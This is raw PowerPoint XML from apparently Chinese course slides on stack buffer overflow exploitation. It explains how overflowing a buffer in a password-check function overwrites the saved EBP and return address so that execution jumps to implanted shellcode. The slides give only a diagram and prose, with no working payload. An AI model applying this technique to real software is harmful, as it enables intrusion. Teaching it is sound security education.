      <p:bldP spid="4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100783" y="2968253"/>
            <a:ext cx="11161240" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5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知识点三：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" b="1"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Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5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代码植入示例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2806526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19975" y="1291370"/>
            <a:ext cx="10747122" cy="520351"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="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利用目标：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="240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利用溢出覆盖返回地址，转去执行植入的恶意程序。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="240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9" name="组合 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CBA4C38-133D-4615-AA5C-4AB9BDE3F67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4557168" y="533631"/>
            <a:ext cx="3625157" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B97828-018C-46B1-9C84-9C38BF0C2B0C}"/>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2ECAD2EB-634C-448E-A94C-5E5E4A28D7DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5429430" y="837929"/>
              <a:ext cx="1999890"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漏洞利用：代码植入</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="组合 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE126BC5-E658-46A2-86A7-8AD43FCC4687}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1768970" y="2032149"/>
            <a:ext cx="5323566" cy="4784554"/>
            <a:chOff x="3784495" y="1824169"/>
            <a:chExt cx="5323566" cy="4784554"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="矩形 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A139D8E-FC63-43EC-B77B-880958C29F92}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5205239" y="2176165"/>
              <a:ext cx="2448272" cy="115212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 name="矩形 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CE2D7C1-D5F9-4CCF-8682-830B1FE92A2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5205239" y="3328293"/>
              <a:ext cx="2448272" cy="4320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 name="矩形 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1A0E565-9A52-4031-AC77-4A45DE2ACABE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5205239" y="3760341"/>
              <a:ext cx="2448272" cy="4320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4" name="矩形 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2164C343-F419-4A51-B0EB-C07BA3B26AAE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5205239" y="4192389"/>
              <a:ext cx="2448272" cy="5040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 name="矩形 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45F0397C-8CF2-4F93-854C-C3C384EECAFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5205239" y="4696445"/>
              <a:ext cx="2448272" cy="4320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 name="矩形 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36D28FE9-1ECB-43D0-BDAC-92141C514C24}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5205239" y="5128493"/>
              <a:ext cx="2448272" cy="4320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 name="矩形 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2C33BAA-3544-4E49-97F5-726AC6ECEE6E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5205239" y="5560541"/>
              <a:ext cx="2448272" cy="4320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9" name="矩形 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C652D64-06CC-49D4-A7B8-7C9A7D2C25CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5205239" y="5992589"/>
              <a:ext cx="2448272" cy="4320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任意多边形: 形状 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8B264AB-3CAE-4738-9BE7-3AD9C3FA3B2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4411980" y="2209800"/>
              <a:ext cx="792480" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 792480"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 0"/>
                <a:gd name="connsiteX1" fmla="*/ 792480 w 792480"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 0"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="792480">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="792480" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="190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1" name="任意多边形: 形状 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FC7FA01-12DF-4AE9-B57F-F6A968ECF111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4411980" y="5776565"/>
              <a:ext cx="792480" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 792480"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 0"/>
                <a:gd name="connsiteX1" fmla="*/ 792480 w 792480"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 0"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="792480">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="792480" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="190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42" name="直接箭头连接符 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC6706E4-B95C-4496-BC27-28DA5D3DEFF1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8085559" y="2032149"/>
              <a:ext cx="0" cy="4392488"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="lgDashDot"/>
              <a:tailEnd type="triangle" w="lg" len="lg"/>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A801FB7A-505F-4800-A965-0D5FA50DA1D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3784495" y="2035510"/>
              <a:ext cx="627095" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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ESP</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 name="文本框 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59A20AF5-AEC7-4A5C-82A8-5E6D473B9371}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3784495" y="5560541"/>
              <a:ext cx="655949" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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EBP</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5" name="文本框 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E2FF845-EB74-4266-9356-386D4BBBCE9F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8153954" y="1824169"/>
              <a:ext cx="954107" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyP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低地址</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="文本框 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{739485E2-7720-4617-853E-A764B724CF3C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8153954" y="6208613"/>
              <a:ext cx="954107" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyP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高地址</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="文本框 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1A6DC36-7137-45A8-85B9-0EDF9357C544}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5275629" y="2218031"/>
              <a:ext cx="2307491" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>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VerifyPwd</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函数栈帧</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="文本框 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{216E461B-9FF4-4ED4-87C3-B9B2FD0CEF2E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5275629" y="3342419"/>
              <a:ext cx="2300823" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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Buffer[0…3]</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机器码</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="文本框 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3B882A2-3CCF-47CB-84E3-D58812AA70F9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6080561" y="3720271"/>
              <a:ext cx="697627" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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1" name="文本框 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87299AF5-55A9-44E5-A186-35DFC0E15271}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5150723" y="4706530"/>
              <a:ext cx="2557303" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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Buffer[40…43]</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机器码</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="文本框 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F52EA0FC-1DCF-4F6E-8481-9905DCDC514E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5627807" y="5106640"/>
              <a:ext cx="1665841" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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Flag</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（覆盖）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="文本框 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B343892C-C656-49AD-B469-86A3EC7C97D9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5256714" y="5568543"/>
              <a:ext cx="2451312" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyP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前栈帧</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EBP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（覆盖）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="文本框 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A7C4DF6-4518-49DC-9DA7-CB4B49A4200E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5364115" y="6000591"/>
              <a:ext cx="2236510" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyP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返回地址（覆盖）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="66" name="直接连接符 65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="39" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5637986" y="6416593"/>
            <a:ext cx="4031749"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V="1">
            <a:off x="9669735" y="3750454"/>
            <a:ext cx="0" cy="2658173"/>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5637986" y="3750532"/>
            <a:ext cx="4031749" cy="9809"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="0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6213351" y="3165679"/>
            <a:ext cx="6323206" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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精心设计，使得覆盖返回地址转到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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头部运行植入的代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2925576966"/>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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="3" presetClass="entr" presetSubtype="10"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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="67"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="3" presetClass="entr" presetSubtype="10" fill="hold" nodeType="with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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="25"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a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF16C0EE-F047-4513-ABE9-3621ABC453F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1441885" y="1096045"/>
            <a:ext cx="10369152" cy="790051"/>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往往需要用汇编语言编写，并转换成二进制机器码，其内容和长度经常还会受到很多苛刻限制，故开发和调试的难度很高。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="20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6" name="组合 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD347A7E-720A-4884-A096-9C78F61DAD5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1461507" y="2248173"/>
            <a:ext cx="6517838" cy="508862"/>
            <a:chOff x="2107780" y="2392189"/>
            <a:chExt cx="6517838" cy="508862"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="矩形 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{536EA6FA-40ED-436D-8252-6125F0240726}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7437488" y="2392189"/>
              <a:ext cx="648072" cy="50886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矩形 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25A77C8B-9070-4B5E-85DF-207E61F878E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3765079" y="2392189"/>
              <a:ext cx="3672408" cy="508860"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="005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Round Same Side Corner Rectangle 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19A88192-2944-4494-B7CD-8A1F42828084}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="3175148" y="1324824"/>
              <a:ext cx="508859" cy="2643596"/>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13" name="Round Same Side Corner Rectangle 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C09C9176-8185-486A-A641-401563BBC50B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1">
              <a:off x="8084140" y="2359572"/>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20" name="Rectangle 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B5598E8-F917-47BA-893C-2A64CCCB84CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2198331" y="2392191"/>
              <a:ext cx="6247268"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植入代码之前需要做大量的调试工作，例如：</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="组合 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5D5D0E2-7DC7-400A-89AC-45A9E2393849}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1484277" y="2944154"/>
            <a:ext cx="10369152" cy="1200329"/>
            <a:chOff x="5136783" y="2471924"/>
            <a:chExt cx="8874215" cy="1200329"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="六边形 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F0C3D76-B034-4819-93C8-7F5B8CD88B3D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
